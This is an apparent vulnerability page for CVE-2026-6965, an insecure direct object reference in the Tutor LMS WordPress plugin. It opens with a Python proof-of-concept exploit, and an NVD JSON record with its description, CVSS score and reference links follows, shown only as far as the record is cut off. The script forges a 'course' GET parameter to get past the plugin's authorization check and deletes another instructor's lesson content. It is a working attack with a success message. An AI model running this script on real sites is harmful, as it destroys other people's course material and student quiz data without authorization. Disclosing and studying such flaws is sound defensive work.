CVE-2026-6965

import requests # Configuration target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_cookie = "wordpress_logged_in_xxx=attacker_session_id" # Scenario: Attacker wants to delete a lesson (lesson_id=55) belonging to another instructor. # The attacker controls course_id=10 (where they have instructor privileges). # The vulnerability allows passing course_id=10 in the GET parameter to pass the check, # while the POST body targets lesson_id=55. payload = { "action": "tutor_delete_topic", # Example action "topic_id": 55 # Target content ID belonging to victim } # Malicious GET parameters to bypass can_user_manage() params = { "course": 10 # Attacker's controlled course ID } headers = { "Cookie": attacker_cookie, "Content-Type": "application/x-www-form-urlencoded" } response = requests.post(target_url, data=payload, params=params, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Target content likely deleted.") else: print("[-] Exploit failed.")

{"cve": {"id": "CVE-2026-6965", "sourceIdentifier": "[email protected]", "published": "2026-05-13T06:16:15.087", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to and including 3.9.9. This is due to the `get_course_id_by()` function unconditionally trusting the user-supplied `course` GET parameter as the authoritative course ID for content ownership lookups, which is then consumed by `can_user_manage()`, the plugin's sole authorization gate for instructor-level operations, causing it to evaluate instructor membership against the attacker-controlled course rather than the course that actually owns the target content object. This makes it possible for authenticated attackers, with instructor-level access and above, to perform unauthorized operations on any other instructor's course content, including permanently deleting lessons, assignments, quizzes (with cascading deletion of all student attempt data), topics, announcements, and Q&A threads, as well as creating or modifying lessons, topics, and announcements in victim courses, manipulating student quiz grades, and reading unpublished lesson and quiz content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Ajax.php#L294", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Ajax.php#L507", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Ajax.php#L586", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Announcements.php#L105", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L1997", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2045", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Lesson.php#L186", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Lesson.php#L243", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Lesson.php#L341", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Q_And_A.php#L219", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Q_And_A.php#L297", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Q_And_A.php#L339", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Quiz.php#L1007", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Quiz.php#L1041", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Quiz.php#L888", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Utils.php#L7829", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Utils.php#L8020", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Ajax.php#L294", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Ajax.php#L507", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Ajax.php#L586", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Announcements.php#L105", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Course.php#L1997", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Course.php#L2045", "so ... (truncated)